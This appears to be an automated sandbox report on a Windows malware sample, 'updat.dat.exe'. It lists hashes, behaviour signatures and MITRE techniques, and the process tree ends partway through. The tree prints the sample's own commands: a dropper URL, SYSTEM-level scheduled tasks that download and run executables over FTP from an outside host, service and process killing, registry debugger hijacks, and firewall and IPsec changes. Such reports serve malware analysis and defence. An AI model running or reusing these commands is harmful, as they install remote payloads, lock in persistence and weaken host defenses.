f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6

Analysis

max time kernel
150s
max time network
126s
platform
windows7_x64
resource
win7v20210410
submitted
07-05-2021 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

updat.dat.exe
Size

307KB
MD5

a6ab2c2fd64e96dcfbf2cef7b2b40863
SHA1

072e8e442c5727d52c42cf892c58cf9f143ed2a7
SHA256

f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6
SHA512

49e83aebe95241348058a5320a8737d0756247892f3b1bfe913bc2a15cf2b1040b88dc897d0b31641d5252740272901d04104cfabb3b32e747489d268eab4de7

Score

10^/10

evasion persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.26.113.95:8095/batpower2.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 912 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

lsma12.exelsma12.exeexcludess.exeexcludess2.exe

pid process

1984 lsma12.exe
1952 lsma12.exe
752 excludess.exe
1700 excludess2.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
7	912	powershell.exe

pid	process
1984	lsma12.exe
1952	lsma12.exe
752	excludess.exe
1700	excludess2.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\inf\aspnet\lsma12.exe	upx
\Windows\inf\aspnet\lsma12.exe	upx
C:\Windows\inf\aspnet\lsma12.exe	upx

Loads dropped DLL 3 IoCs

Processes:

cmd.execmd.execmd.exe

pid process

668 cmd.exe
1672 cmd.exe
1136 cmd.exe

pid	process
668	cmd.exe
1672	cmd.exe
1136	cmd.exe

Drops file in Windows directory 5 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\windows\update.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\excludess.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\excludess2.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\lsma12.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\config.json	powershell.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

lsma12.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	lsma12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	lsma12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	lsma12.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1512 schtasks.exe
468 schtasks.exe
852 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1984 timeout.exe

pid	process
1512	schtasks.exe
468	schtasks.exe
852	schtasks.exe

pid	process
1984	timeout.exe

Kills process with taskkill 20 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1672	taskkill.exe
1584	taskkill.exe
852	taskkill.exe
1308	taskkill.exe
1988	taskkill.exe
588	taskkill.exe
1892	taskkill.exe
824	taskkill.exe
1316	taskkill.exe
2012	taskkill.exe
1336	taskkill.exe
552	taskkill.exe
1000	taskkill.exe
1208	taskkill.exe
656	taskkill.exe
756	taskkill.exe
1824	taskkill.exe
1480	taskkill.exe
1956	taskkill.exe
1192	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

Processes:

powershell.exelsma12.exe

pid	process
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe
1984	lsma12.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	552	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1272	WMIC.exe
Token: SeSecurityPrivilege	1272	WMIC.exe
Token: SeTakeOwnershipPrivilege	1272	WMIC.exe
Token: SeLoadDriverPrivilege	1272	WMIC.exe
Token: SeSystemProfilePrivilege	1272	WMIC.exe
Token: SeSystemtimePrivilege	1272	WMIC.exe
Token: SeProfSingleProcessPrivilege	1272	WMIC.exe
Token: SeIncBasePriorityPrivilege	1272	WMIC.exe
Token: SeCreatePagefilePrivilege	1272	WMIC.exe
Token: SeBackupPrivilege	1272	WMIC.exe
Token: SeRestorePrivilege	1272	WMIC.exe
Token: SeShutdownPrivilege	1272	WMIC.exe
Token: SeDebugPrivilege	1272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1272	WMIC.exe
Token: SeRemoteShutdownPrivilege	1272	WMIC.exe
Token: SeUndockPrivilege	1272	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

updat.dat.exeWScript.execmd.exe

description	pid	process	target process
PID 1360 wrote to memory of 1972	1360	updat.dat.exe	WScript.exe
PID 1360 wrote to memory of 1972	1360	updat.dat.exe	WScript.exe
PID 1360 wrote to memory of 1972	1360	updat.dat.exe	WScript.exe
PID 1360 wrote to memory of 1972	1360	updat.dat.exe	WScript.exe
PID 1972 wrote to memory of 1772	1972	WScript.exe	cmd.exe
PID 1972 wrote to memory of 1772	1972	WScript.exe	cmd.exe
PID 1972 wrote to memory of 1772	1972	WScript.exe	cmd.exe
PID 1972 wrote to memory of 1772	1972	WScript.exe	cmd.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 552	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 552	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 552	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 552	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1000	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1000	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1000	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1000	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1208	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1208	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1208	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1208	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 656	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 656	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 656	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 656	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1480	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1480	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1480	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1480	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1672	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1672	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1672	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1672	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 856	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 856	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 856	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 856	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1072	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1072	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1072	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1072	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1976	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1976	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1976	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1976	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1272	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1272	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1272	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1272	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1984	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1984	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1984	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1984	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1736	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1736	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1736	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1736	1772	cmd.exe	reg.exe
PID 1772 wrote to memory of 1956	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1956	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1956	1772	cmd.exe	taskkill.exe
PID 1772 wrote to memory of 1956	1772	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\updat.dat.exe
"C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\windows\TEMP\n.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\temp\c3m.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im msinfo.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhos.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhou.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhot.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhous.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:656

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoss.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundll32.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:856

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1072

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1272

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\temp\conhou.exe /e /d system
4⤵
PID:1780

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\temp\conhos.exe /e /d system
4⤵
PID:816

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\temp\conhot.exe /e /d system
4⤵
PID:1768

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\system\msinfo.exe /e /d system
4⤵
PID:1676

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\debug\item.dat /e /d system
4⤵
PID:756

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\debug\winu.bat /e /d system
4⤵
PID:1192

C:\Windows\SysWOW64\cmd.exe
cmd /c net1 stop ASBservice
4⤵
PID:1664

C:\Windows\SysWOW64\net1.exe
net1 stop ASBservice
5⤵
PID:1512

C:\Windows\SysWOW64\sc.exe
sc delete ASBservice
4⤵
PID:944

C:\Windows\SysWOW64\net1.exe
net1 stop msupdate
4⤵
PID:852

C:\Windows\SysWOW64\sc.exe
sc delete msupdate
4⤵
PID:1756

C:\Windows\SysWOW64\net1.exe
net1 stop clr_optimization_v4.0.30328_64
4⤵
PID:1820

C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30328_64
4⤵
PID:1228

C:\Windows\SysWOW64\net1.exe
net1 stop MicrosoftMsql
4⤵
PID:1680

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMsql
4⤵
PID:1008

C:\Windows\SysWOW64\net1.exe
net1 stop netsv
4⤵
PID:1672

C:\Windows\SysWOW64\sc.exe
sc delete netsv
4⤵
PID:856

C:\Windows\SysWOW64\net1.exe
net1 stop NetworkServices
4⤵
PID:1988

C:\Windows\SysWOW64\sc.exe
sc delete NetworkServices
4⤵
PID:2036

C:\Windows\SysWOW64\net1.exe
net1 stop "Network Remote"
4⤵
PID:1816

C:\Windows\SysWOW64\sc.exe
sc delete "Network Remote"
4⤵
PID:1604

C:\Windows\SysWOW64\net1.exe
net1 stop "WinTaskCtrlService"
4⤵
PID:1732

C:\Windows\SysWOW64\sc.exe
sc delete "WinTaskCtrlService"
4⤵
PID:1724

C:\Windows\SysWOW64\net1.exe
net1 stop remotecall
4⤵
PID:1700

C:\Windows\SysWOW64\sc.exe
sc delete remotecall
4⤵
PID:1108

C:\Windows\SysWOW64\net1.exe
net1 stop rpcept
4⤵
PID:512

C:\Windows\SysWOW64\sc.exe
sc delete rpcept
4⤵
PID:1336

C:\Windows\SysWOW64\net1.exe
net1 stop csrss
4⤵
PID:888

C:\Windows\SysWOW64\sc.exe
sc delete csrss
4⤵
PID:1144

C:\Windows\SysWOW64\net1.exe
net1 stop "windows audio control"
4⤵
PID:300

C:\Windows\SysWOW64\sc.exe
sc delete "windows audio control"
4⤵
PID:1192

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
4⤵
- Creates scheduled task(s)
PID:1512

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0212.site>ps&echo test>>ps&echo 1433>>ps&echo get sab.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
4⤵
- Creates scheduled task(s)
PID:468

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F
4⤵
- Creates scheduled task(s)
PID:852

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindowsa" /F
4⤵
PID:1756

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindowsu" /F
4⤵
PID:1472

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindows" /F
4⤵
PID:1064

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F
4⤵
PID:1168

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
4⤵
PID:1720

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
4⤵
PID:1780

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
4⤵
PID:512

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete
4⤵
PID:1196

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Mysa3" /F
4⤵
PID:1192

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "ok" /F
4⤵
PID:1512

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "\Mysa1" /F
4⤵
PID:468

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "WindowsUpdate1" /F
4⤵
PID:852

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "OfficeUpdaterA" /F
4⤵
PID:1756

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F
4⤵
PID:1812

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "WindowsUpdate3" /F
4⤵
PID:308

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "at6" /F
4⤵
PID:1008

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Windows_Update" /F
4⤵
PID:1168

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update" /F
4⤵
PID:1976

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update2" /F
4⤵
PID:1004

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update4" /F
4⤵
PID:752

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update3" /F
4⤵
PID:1736

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "windowsinit" /F
4⤵
PID:2036

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "System Security Check" /F
4⤵
PID:1272

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
4⤵
PID:1972

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "updat_windows" /F
4⤵
PID:1136

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "at1" /F
4⤵
PID:1720

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "at2" /F
4⤵
PID:1352

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete "\Microsoft\Windows\UPnP\Services" /F
4⤵
PID:1468

C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= auto
4⤵
PID:1948

C:\Windows\SysWOW64\net.exe
net start MpsSvc
4⤵
PID:888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MpsSvc
5⤵
PID:1676

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete policy name=win
4⤵
PID:572

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete filterlist name=Allowlist
4⤵
PID:868

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete filterlist name=denylist
4⤵
PID:588

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete filteraction name=allow
4⤵
PID:1892

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="tcp all" dir=in
4⤵
PID:824

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
4⤵
PID:1988

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
4⤵
PID:1984

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="tcpall" dir=out
4⤵
PID:1724

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
4⤵
PID:1332

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
4⤵
PID:956

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
4⤵
PID:756

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
4⤵
PID:1512

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
4⤵
PID:1228

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=win
4⤵
PID:1576

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
4⤵
PID:1672

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
4⤵
PID:1776

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
4⤵
PID:1604

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
4⤵
PID:816

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
4⤵
PID:1768

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
4⤵
PID:956

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
4⤵
PID:1664

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
4⤵
PID:468

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1680

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
4⤵
PID:1704

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=win assign=y
4⤵
PID:1072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
4⤵
PID:2036

C:\Windows\SysWOW64\find.exe
find "5.1."
4⤵
PID:1612

C:\Windows\SysWOW64\Wbem\WMIC.exe
